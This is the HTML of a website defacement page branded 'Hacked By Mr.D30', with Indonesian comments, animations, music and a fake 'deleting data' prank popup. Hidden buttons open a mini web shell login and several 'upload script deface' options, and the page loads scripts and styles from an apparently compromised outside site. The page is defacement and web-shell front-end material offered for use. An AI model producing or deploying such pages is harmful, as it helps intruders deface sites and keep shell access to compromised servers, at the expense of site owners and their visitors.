<!DOCTYPE html>
<!-- Script deface -->
<html>
    <!-- Star Head -->
    <head>
        <!-- Title/judul -->
        <title>Hacked By Mr.D30</title>
        <!-- Meta Script -->
<link href="https://b.top4top.io/p_17143s5sr0.png" rel="icon"><meta name="og:image" content="https://b.top4top.io/p_17143s5sr0.png"> 
    <meta name="theme-color" content='green'/>
    <meta property="og:image:secure_url"https://b.top4top.io/p_17143s5sr0.png" />
        <meta name="title" content="Mr.D30">
        <meta name="description" content="Hacked By Mr.D30" />
        <!-- sweetalert2
        #### jangan di ganti ####-->
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
        <script src="http://www.ctwood.com.sg/style/alert.js" ></script>
        <!-- Font Family -->
        <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
 <script type="text/javascript">new TypingText(document.getElementById("hack"), 50, function(i) { var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });TypingText.runAll();</script><head><meta name="viewport" content="width=800, user-scalable=no"><svg> <defs> <filter id="glow"> <fegaussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs><meta name="theme-color" content="black"></svg><style>@import url('https://fonts.googleapis.com/css?family=Audiowide&display=swap');>>>html,body{ margin: 0px; overflow: hidden;}.wrap{ position: absolute; left: 50%; top: 50%; transform: translate(-50%, -50%);}h2{ position: absolute; top: 50%; left: 50%; margin-top: 150px; font-size: 32px; text-transform: uppercase; transform: translate(-50%, -50%); display:  color: #12000a; font-weight: 300; font-family: Audiowide; text-shadow: 0px 0px 4px #12000a; animation: fadeInText 3s ease-in 3.5s forwards, flicker4 5s linear 7.5s infinite, hueRotate 6s ease-in-out 3s infinite;}#svgWrap_1,#svgWrap_2{ position: absolute; height: auto; width: 600px; max-width: 100%; top: 50%; left: 50%; transform: translate(-50%, -50%);}#svgWrap_1,#svgWrap_2,div{ animation: hueRotate 6s ease-in-out 3s infinite;}#id1_1,#id2_1,#id3_1{ stroke: #ff005d; stroke-width: 3px; fill: transparent; filter: url(#glow);}#id1_2,#id2_2,#id3_2{ stroke: #12000a; stroke-width: 3px; fill: transparent; filter: url(#glow);}#id3_1{ stroke-dasharray: 940px; stroke-dashoffset: -940px; animation: drawLine3 2.5s ease-in-out 0s forwards, flicker3 4s linear 4s infinite;}#id2_1{ stroke-dasharray: 735px; stroke-dashoffset: -735px; animation: drawLine2 2.5s ease-in-out 0.5s forwards, flicker2 4s linear 4.5s infinite;}#id1_1{ stroke-dasharray: 940px; stroke-dashoffset: -940px; animation: drawLine1 2.5s ease-in-out 1s forwards, flicker1 4s linear 5s infinite;}@keyframes drawLine1 { 0% {stroke-dashoffset: -940px;} 100%{stroke-dashoffset: 0px;}}@keyframes drawLine2 { 0% {stroke-dashoffset: -735px;} 100%{stroke-dashoffset: 0px;}}@keyframes drawLine3 { 0% {stroke-dashoffset: -940px;} 100%{stroke-dashoffset: 0px;}}@keyframes flicker1{ 0% {stroke: #ff005d;} 1% {stroke: transparent;} 3% {stroke: transparent;} 4% {stroke: #ff005d;} 6% {stroke: #ff005d;} 7% {stroke: transparent;} 13% {stroke: transparent;} 14% {stroke: #ff005d;} 100%{stroke: #ff005d;}}@keyframes flicker2{ 0% {stroke: #ff005d;} 50% {stroke: #ff005d;} 51% {stroke: transparent;} 61% {stroke: transparent;} 62% {stroke: #ff005d;} 100%{stroke: #ff005d;}}@keyframes flicker3{ 0% {stroke: #ff005d;} 1% {stroke: transparent;} 10% {stroke: transparent;} 11% {stroke: #ff005d;} 40% {stroke: #ff005d;} 41% {stroke: transparent;} 45% {stroke: transparent;} 46% {stroke: #ff005d;} 100%{stroke: #ff005d;}}@keyframes flicker4{ 0% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 30% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 31% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 32% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 36% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 37% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 41% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 42% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 85% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 86% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 95% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 96% {color: #ff005d;text-shadow:0px 0px 4px #ff005d;} 100%{color: #ff005d;text-shadow:0px 0px 4px #ff005d;}}@keyframes fadeInText{ 1% {color: #12000a;text-shadow:0px 0px 4px #12000a;} 70% {color: #ff005d;text-shadow:0px 0px 14px #ff005d;} 100%{color: #ff005d;text-shadow:0px 0px 4px #ff005d;}}@keyframes hueRotate{ 0% { filter: hue-rotate(0deg); } 50% { filter: hue-rotate(-120deg); } 100% { filter: hue-rotate(0deg); }}</style><div></div>
 <style> @import url('https://fonts.googleapis.com/css?family=Aldrich&display=swap'); body{ font-family: 'Aldrich', sans-serif; background-color: #333333; background-size: cover; color: #1BBAA3; text-align:center; } .gambar{ width: 50%; position: relative; top: 30px; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; border-radius: 100%; } .posisi{ position: relative; top: 100px; text-align: center; } .input1{ font-family: 'Aldrich', sans-serif; background: transparent; border: 2px solid #1BBAA3; border-radius: 5px; outline:none; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; } .input1:hover{ box-shadow: 0px 0px 15px red; -moz-box-shadow: 0px 0px 15px red; -webkit-box-shadow: 0px 0px 15px red; border: 2px solid red; color: red; } .text{ font-family: 'Aldrich', sans-serif; position: relative; top: 87px; font-size: 10px; } .button{ font-family: 'Aldrich', sans-serif; outline: none; background: transparent; width: 30%; height: 30px; color: #1BBAA3; border-radius: 8px; border: 2px solid #1BBAA3; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; } .button:hover{ border: 2px solid red; transform: scale(1.0); color: red; box-shadow: 0px 0px 15px red; -moz-box-shadow: 0px 0px 15px red; -webkit-box-shadow: 0px 0px 15px red; } .footer { position: fixed; right: 0; border: 2px solid black; bottom: 0; width: 100%; background-color: #333333; color: white; box-shadow: 0px 0px 15px black; -moz-box-shadow: 0px 0px 15px black; -webkit-box-shadow: 0px 0px 15px black; } </style> 
        <style type="text/css">
        /* latin */ @font-face { font-family: 'Iceland'; font-style: normal; font-weight: 400; src: local('Iceland'), local('Iceland-Regular'), url(https://fonts.gstatic.com/s/iceland/v8/rax9HiuFsdMNOnWPaKtMARJYk0o.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }
	</style>
	<!-- style body -->
	<link rel="stylesheet" href="http://ctwood.com.sg/style/shell.css" />
	<!-- style login shell -->
	<style type="text/css">
	@import url(https://fonts.googleapis.com/css?family=Lato:600);

body {
justify-content: center;
align-items: center;
height: 100vh;
background-image: url("https://i.pinimg.com/originals/6f/07/28/6f072835fe054b9d634dd5eb33933b85.jpg");
   color:black;
	background-attachment:fixed;
	background-repeat:no-repeat;
	background-position:center;
	background-color: pink;
	-webkit-background-size: 100% 100%;}  
html {
	justify-content: center;
align-items: center;
height: 100vh;
	background-attachment:fixed;
	background-repeat:no-repeat;
	background-position:center;
	background-color: aqua;
	background-color-font: White;
	-webkit-background-size: 100% 100%;

}    .tombol{
  background:#2C97DF;
  color:white;
  border-top:0;
  border-left:0;
  border-right:0;
  border-bottom:5px solid #2A80B9;
  padding:10px 20px;
  text-decoration:none;
  font-family:sans-serif;
  font-size:11pt;
  
}
h1{
	font-family:Kelly Slab;
	font-size:30px;
	}
input[type=password] {
	border: 1px solid #15CFF4;
	width: 300px;
	height: 25px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: gold;
	font-family:Kelly Slab;
	font-size: 13px;
}
.page{
    		position: absolute;
    		margin: auto;
    		height: 50%;
    		top: 0; bottom: 0; left: 0; right:0;
     	}
  .blink_text {
-webkit-animation-name: blinker;
-webkit-animation-duration: 1s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 3s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: yellow;
}
@-moz-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
 
 #copy {
 	color: blue;
 	font-weight: bold;
 	font-family: Kelly Slab;
 }
 #copy a {
 	color: red;
 }
 #copy a:hover {
 	color: blue;
 }

body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
#content tr:hover{
background-color: aqua;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: #15CFF4;
}
table{
border: 1px #000000;
}
.s_tb{
border:1px silver;
}
a{
color:red;
font-size: 19px;
text-decoration:none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
h2{
font-family:Kelly Slab;
font-size:25px;
color:white;
}
h3{
font-size:35px;
}
h4{
font-size:15px;
font-family:Kelly Slab;
color:white;
}
.arif_table {;
	background:transparent;
	border:1px solid blue;
	font-family:Kelly Slab;
    display:inline-block;
	cursor:pointer;
	color:#15CFF4;
	font-size:17x;
	font-weight:bold;
	padding:3px 20px;
	text-decoration:none;
	text-shadow:0px -1px 0px white;
       }
       .arif_table {;
	background:transparent;
	border:2px solid silver;
	font-family:Kelly Slab;
	color:white;
	font-size:17x;
	font-weight:bold;
	padding:3px 20px;
	text-decoration:none;
	text-shadow:0px -1px 0px #ff0505;
       }
     .potext {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family:Kelly Slab;
	font-size: 13px;
}
</style>
    <!-- javascript sweet alrt -->
    <script type="text/javascript" >
        
        	    function mini(){
        	        Swal.fire({
  title: 'login mini shell?',
  icon: 'question',
  iconHtml: '✓',
  confirmButtonText: 'No',
  cancelButtonText: 'No',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("?login=shell");
        }
      })
        	    }
        	    function up(){
        	        Swal.fire({
  title: 'upload script deface?',
  icon: 'question',
  iconHtml: '?',
  confirmButtonText: 'ya',
  cancelButtonText: 'no',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("?akses=html");
        }
      })
      
        	    }
function ups(){
        	        Swal.fire({
  title: 'upload script deface?',
  icon: 'question',
  iconHtml: '@',
  confirmButtonText: 'Start',
  cancelButtonText: 'Home',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("?akses=9233");
        }
      })
      
        	    }
        	
function asu(){
        	        Swal.fire({
  title: 'upload script deface?',
  icon: 'question',
  iconHtml: '',
  confirmButtonText: 'Start',
  cancelButtonText: 'Home',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("?akses=404");
        }
      })
      
        	    }
        
        function asy(){
        	        Swal.fire({
  title: 'upload script deface?',
  icon: 'question',
  iconHtml: '',
  confirmButtonText: 'Start',
  cancelButtonText: 'Home',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("?akses=HTM");
        }
      })
      
        	    }
        	
function github(){
  Swal.fire({
      
  title: 'Submit Your Name',
  text:'contoh: Hack',
  input: 'text',
  inputAttributes: {
    autocapitalize: 'off'
  },
  showCancelButton: true,
  confirmButtonText: 'Look up',
  showLoaderOnConfirm: true,
  preConfirm: (login) => {
    return fetch(`https://api.github.com/users/${login}`)
      .then(response => {
        if (!response.ok) {
          throw new Error(response.statusText)
        }
        return response.json()
      })
      .catch(error => {
        Swal.showValidationMessage(
          `Request failed: ${error}`
        )
      })
  },
  allowOutsideClick: () => !Swal.isLoading()
}).then((result) => {
  if (result.value) {
    Swal.fire({
      title: `${result.value.login}'s avatar`,
      imageUrl: result.value.avatar_url
    })
  }
})

}

function hapus(){
let timerInterval
Swal.fire({
  title: 'Hapus Data!',
  icon: 'warning',
  html: 'Sedang Menghapus <b></b> mb',
  timer: 5000,
  timerProgressBar: false,
  onBeforeOpen: () => {
    Swal.showLoading()
    timerInterval = setInterval(() => {
      Swal.getContent().querySelector('b')
        .textContent = Swal.getTimerLeft()
    }, 100)
  },
  onClose: () => {
    clearInterval(timerInterval)
  }
}).then((result) => {
  if (
    /* Read more about handling dismissals below */
    result.dismiss === Swal.DismissReason.timer,
    swal.fire({
        
      title: 'Prankk!!!!',
      text: 'Anda Kena Prankk Aowkwk!!!!!',
       icon: 'success',
       showConfirmButton: false,
       footer:'<button><a href="http://api.whatsapp.com/send?phone=6282110780585&text=Hello Bro,You Gans">Contacts Me </a></button>'
       
    })
  
  ){
    console.log('I was closed by the timer') // eslint-disable-line
  }
})
}

function ip(){
const ipAPI = 'https://api.ipify.org?format=json'

Swal.queue([{
  title: 'Perlihatkan ip ku',
  confirmButtonText: 'Show my IP',
  text:
    'ini hanya untuk memperlihatkan ' +
    'ip saja (Aman)',
  showLoaderOnConfirm: true,
  preConfirm: () => {
    return fetch(ipAPI)
      .then(response => response.json())
      .then(data => Swal.insertQueueStep(data.ip))
      .catch(() => {
        Swal.insertQueueStep({
          icon: 'error',
          title: 'maaf tidak bisa menampilkan ip anda'
        })
      })
  }
}])
}
    </script>
    </head>
    <!-- End Head -->
    <!-- Star Body -->
    <body>
    <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<style> @import url('https://fonts.googleapis.com/css?family=Aldrich&display=swap'); body{ font-family: 'Aldrich', sans-serif; background-color: #333333; background-size: cover; color: #1BBAA3; text-align:center; } .gambar{ width: 50%; position: relative; top: 30px; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; border-radius: 100%; } .posisi{ position: relative; top: 100px; text-align: center; } .input1{ font-family: 'Aldrich', sans-serif; background: transparent; border: 2px solid #1BBAA3; border-radius: 5px; outline:none; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; } .input1:hover{ box-shadow: 0px 0px 15px red; -moz-box-shadow: 0px 0px 15px red; -webkit-box-shadow: 0px 0px 15px red; border: 2px solid red; color: red; } .text{ font-family: 'Aldrich', sans-serif; position: relative; top: 87px; font-size: 10px; } .button{ font-family: 'Aldrich', sans-serif; outline: none; background: transparent; width: 30%; height: 30px; color: #1BBAA3; border-radius: 8px; border: 2px solid #1BBAA3; box-shadow: 0px 0px 15px #1BBAA3; -moz-box-shadow: 0px 0px 15px #1BBAA3; -webkit-box-shadow: 0px 0px 15px #1BBAA3; } .button:hover{ border: 2px solid red; transform: scale(1.0); color: red; box-shadow: 0px 0px 15px red; -moz-box-shadow: 0px 0px 15px red; -webkit-box-shadow: 0px 0px 15px red; } .footer { position: fixed; right: 0; border: 2px solid black; bottom: 0; width: 100%; background-color: #333333; color: white; box-shadow: 0px 0px 15px black; -moz-box-shadow: 0px 0px 15px black; -webkit-box-shadow: 0px 0px 15px black; } </style></head>

<script>
//Function ketok
function ketok() {
      document.getElementById('picek').style.visibility = "visible";
    }
    function myFunction() {
      var x = document.getElementById("Gans");
      if (x.style.display === "none") {
        x.style.display = "block";
      } else {
        x.style.display = "none";
      }
    }
    window.setTimeout(1000); 
function cok(){ document.getElementById('ketok').style.visibility="hidden"; 
}
//Lagu nya
function Mulailagucok(){ var audio = document.getElementById("lagu"); audio.play();
}
//Function picek
</script><script>
//Function keliatan
function ketok() {
      document.getElementById('picek').style.visibility = "visible";
    }
    function myFunction() {
      var x = document.getElementById("Gans");
      if (x.style.display === "none") {
        x.style.display = "block";
      } else {
        x.style.display = "none";
      }
    }
    window.setTimeout(1000); 
function cok(){ document.getElementById('ketok').style.visibility="hidden"; 
}
//Lagu nya
function Mulailagucok(){ var audio = document.getElementById("lagu"); audio.play();
}
//Function gakeliatan
</script>
<!--THIS A MUSIC-->
<audio id="lagu" src="https://g.top4top.io/m_1715gosf70.mp3"></audio>
<!--End Music-->
     <!-- Header -->
        <center>
            <p class="blink_text"style="font-size:45px;color: blue;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Kelly Slab;"> ..:: Mr.D30 :..</p><br>
            <body>
<font color ="gold">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/daun-berguguran.js" type="text/javascript"></script>
<font size="2"><br><br><br><br><center></span><h2><table color="red">
<img src="https://d.top4top.io/p_1714c2wom0.png"  height="300"><font face="Iceland" size="8" color="orangered">
<center><iframe scrolling='no' frameborder='no' size="15" clocktype='html5' style='Fredericka the Great:hidden;border:0;margin:0;padding:0;width:200px;height:30px;'src='https://www.clocklink.com/html5embed.php?clock=036&timezone=ICT&color=blue&size=340&Title=&Message=&Target=&From=2019,1,1,0,0,0&Color=black'><br/></iframe></center>
<font face="Iceland" size="8" color="orangered">-=[ Hacked By Mr.D30 ]=-</center> <table width="820px"> <tbody> <tr> <td align="center"> <span style="font: 40px Courier;size:40px;color:green;"> <strong> <marquee behavior="alternate" scrollamount="6" style="border:4px solid;" width="90%"> <font size="8" color="Yellow" face="courier">Ape Lo liat liat &#128405 </font> </marquee> 
</font>
<pre><script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;	// Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);	// We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
	this.currentText = "";
	this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script>
<body onLoad="document.f.p.focus()" background-image: url("https://images.unsplash.com/photo-1548641897-4046af67cf08?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=668&q=80" topmargin="0") leftmargin="0" marginwidth="0" marginheight="0">
<center><code>
<font id="ResponseData" color="#FFFFFF">
</pre>
<br>
<script type="text/javascript">
new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
TypingText.runAll();
</script>
<BR>
<B><font color=red>
<BR></b>
</div>
</fieldset>
<br><br>
<br><font color=#F8FF00 size="4">..:::[  <font face="Iceland" size="4" color=#FF003F>Mr.D30</font>  ]:::..</font></code></center></body></html>
<div style="padding:10px;border-bottom:1px solid #E6FF00;border-top:1px solid #FF00E1;">
    <center><font color=#5CB600 face="Iceland" size="5" ><a href="www.felix.tag-eg.com" target="_blank">COPYRIGHT 2020<strong> By Mr.D30</strong></a></div></font></center>

</html>
<!-- Tombol Jangan Di Ganti --> <!--MASIH KELIATAN--> 		<br> 	 <button class="arif_table" id="ketok" onclick="Mulailagucok();ketok();alert('Tools By Mr.D30');myFunction();wle();">Tools?</button></div></span></font> 		 		 <!--PENCET TOMBOL DAN AKAN HILANG--> <!--gak keliatan--> 		<div id="picek" style="visibility: hidden; margin: 0 auto;margin-top:10px;}"> 		<!--GAK KELIATAN--> <br> <br /><button class="arif_table" onclick="up();alert('Upload html')">Uploader Html</button>
            <button class="arif_table" onclick="github();alert('cek prof')">Cek Profil</button>
            <button class="arif_table" onclick="asu();alert('Gunakan dgn baik dan bijak')">Upload Shtml</button>
            <button class="arif_table" onclick="asy();alert('Mongo Di gunakan')">Upload HTM</button>
            <button class="arif_table" onclick="mini();alert('Login shell ajg')">Login</button>
            <button  class="arif_table" onclick="hapus();alert('Yakin bro?')">Track me</button>
            <button class="arif_table" onclick="ip();alert('Cum Cek ip lu slow aman ko  ini tolos gabut')">Cek Your IP</button><br><br><br><br> <!-- End The Tombol --> </center> <!-- cie nyari kodenya --> </body> <!-- end Body --> 

</html>
</div id="picek" style="visibility: hidden; margin: 0 auto;margin-top:10px;}"> 
<!-- End Script Deface -->
<!-- Akses Upload html-->
	<!-- From Upload Prank -->
	<!-- From Upload Prank -->
	<!-- From Upload Prank -->
	<!-- From Login -->
